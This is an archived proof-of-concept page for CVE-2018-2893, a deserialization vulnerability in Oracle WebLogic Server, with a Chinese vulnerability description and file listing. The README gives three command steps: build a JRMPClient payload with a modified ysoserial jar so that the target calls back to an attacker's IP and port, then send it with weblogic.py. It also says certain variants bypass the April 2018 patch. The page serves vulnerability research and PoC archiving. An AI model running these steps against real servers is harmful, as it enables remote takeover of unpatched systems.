CVE-2018-2893 PoC — Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞

Source

https://github.com/pyn3rd/CVE-2018-2893

Associated Vulnerability

Title:Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞 (CVE-2018-2893)
Description:Oracle Fusion Middleware（Oracle融合中间件）是美国甲骨文（Oracle）公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Core Components子组件存在安全漏洞。攻击者可利用该漏洞控制Oracle WebLogic Server，影响

Description

CVE-2018-2893-PoC

Readme

# CVE-2018-2893

## Step 1

`java -jar ysoserial-cve-2018-2893.jar`

```
WHY SO SERIAL?
Usage: java -jar ysoserial-cve-2018-2893.jar [payload] '[command]'
Available payload types:
     Payload     Authors   Dependencies
     -------     -------   ------------
     JRMPClient  @mbechler
     JRMPClient2 @mbechler
     JRMPClient3 @mbechler
     JRMPClient4 @mbechler
     Jdk7u21     @frohoff
```

## Step 2

`java -jar ysoserial-cve-2018-2893.jar  JRMPClient4  "[IP]:[PORT]"  >  poc4.ser`

## Step 3

`python weblogic.py [HOST] [PORT] poc4.ser`


### Note: Any one of  JRMPClient2|JRMPClient3|JRMPClient4 can be utilized to  bypass the Critical Patch Update April 2018.

File Snapshot


 [4.0K]  /data/pocs/244a638aef772e906ffc4c0bd7c9223a5e25d046
├── [ 672]  README.md
├── [5.3K]  weblogic.py
└── [7.0M]  ysoserial-cve-2018-2893.jar

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!